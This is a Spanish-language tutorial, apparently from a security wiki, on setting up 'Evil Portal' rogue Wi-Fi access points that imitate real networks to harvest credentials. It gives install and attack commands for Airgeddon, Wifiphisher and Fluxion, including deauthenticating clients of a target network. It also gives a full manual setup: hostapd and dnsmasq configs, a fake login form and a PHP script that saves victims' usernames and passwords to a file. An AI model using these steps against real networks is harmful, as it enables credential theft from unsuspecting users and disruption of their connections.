🌐Evil Portal
¿Qué es un Evil Portal?
Un Evil Portal es una técnica utilizada en ataques de red donde se crea un punto de acceso falso que imita una red legítima. Los atacantes configuran este portal malicioso para engañar a los usuarios y hacer que se conecten a él, permitiéndoles capturar credenciales sensibles, información privada y otros datos personales. Este método es comúnmente implementado utilizando herramientas de auditoría de seguridad como las incluidas en Kali Linux, y es especialmente efectivo en entornos donde los usuarios no verifican la autenticidad de las redes a las que se conectan.
Si tienes un adaptador de red en modo monitor, puedes usar herramientas incluidas en Kali Linux como Airgeddon, Wifiphisher, Fluxion o Rogue-AP (manual con Hostapd y Dnsmasq) para crear un Evil Portal
Airgeddon
Airgeddon es una de las mejores opciones, ya que automatiza ataques MITM y Evil Portals.
Instalar Airgeddon
git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
cd airgeddon
sudo bash airgeddon.sh
Iniciar el Ataque
Ejecuta Airgeddon y selecciona tu adaptador en modo monitor.
Ve a la opción Rogue AP Attack > Evil Twin Attack.
Elige una red WiFi objetivo y clona su SSID.
Activa el Evil Portal y elige una plantilla (puedes personalizarla).
Inicia el ataque y espera a que las víctimas ingresen credenciales.
✅ Ventaja: Automatización total, soporte para Evil Portals personalizables.
Wifiphisher
Wifiphisher crea un Access Point falso y redirige a los usuarios a una página de phishing automáticamente.
Instalar Wifiphisher
sudo apt update && sudo apt install wifiphisher -y
Iniciar el Ataque
sudo wifiphisher --essid "WiFi Gratis" --phishing-page firmware-upgrade
📌 Esto creará un punto de acceso falso y mostrará una página falsa de actualización de firmware para capturar credenciales.
✅ Ventaja: Muy rápido y fácil de usar.
Fluxion
Fluxion usa un ataque Evil Twin para desautenticar a los clientes y redirigirlos a un portal cautivo falso.
Instalar Fluxion
git clone https://github.com/FluxionNetwork/fluxion.git
cd fluxion
sudo bash fluxion.sh
Guia del Captive Portal
Iniciar el Ataque
Selecciona "Evil Twin Attack".
Clona el SSID de la red objetivo.
Activa el deautenticador para forzar a los usuarios a reconectarse.
Usa Captive Portal con una página falsa de autenticación.
Captura credenciales en tiempo real.
✅ Ventaja: Redirección con portales cautivos, fácil de configurar.
Rogue AP Manual con Hostapd + Dnsmasq + Apache
Si quieres hacerlo manualmente, puedes configurar un Rogue Access Point con Hostapd, Dnsmasq y Apache.
1️⃣ Instalar Dependencias
sudo apt install hostapd dnsmasq apache2 php -y
2️⃣ Configurar Hostapd
Edita el archivo
/etc/hostapd/hostapd.conf
:
interface=wlan0
driver=nl80211
ssid=WiFi Gratis
hw_mode=g
channel=6
macaddr_acl=0
ignore_broadcast_ssid=0
auth_algs=1
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=password123
Inicia el AP:
sudo hostapd /etc/hostapd/hostapd.conf
Configurar DHCP y Redirección con Dnsmasq
Edita
/etc/dnsmasq.conf
:
interface=wlan0
dhcp-range=192.168.1.2,192.168.1.100,12h
address=/#/192.168.1.1
Inicia Dnsmasq:
sudo systemctl restart dnsmasq
Configurar el Evil Portal en Apache
Edita
/var/www/html/index.html
:
<form action="login.php" method="post">
<input type="text" name="username" placeholder="Usuario">
<input type="password" name="password" placeholder="Contraseña">
<input type="submit" value="Iniciar sesión">
</form>
Edita
/var/www/html/login.php
:
<?php
$file = fopen("creds.txt", "a");
fwrite($file, "Usuario: ".$_POST['username']." | Contraseña: ".$_POST['password']."\n");
fclose($file);
header('Location: https://google.com');
exit();
?>
Otorga permisos:
sudo chmod 777 /var/www/html/creds.txt
Iniciar el Evil Portal
sudo systemctl restart apache2
📌 Ahora cualquier usuario que se conecte verá la página falsa y sus credenciales se guardarán en creds.txt
.
✅ Ventaja: Control total sobre la configuración y personalización.
Última actualización
¿Te fue útil?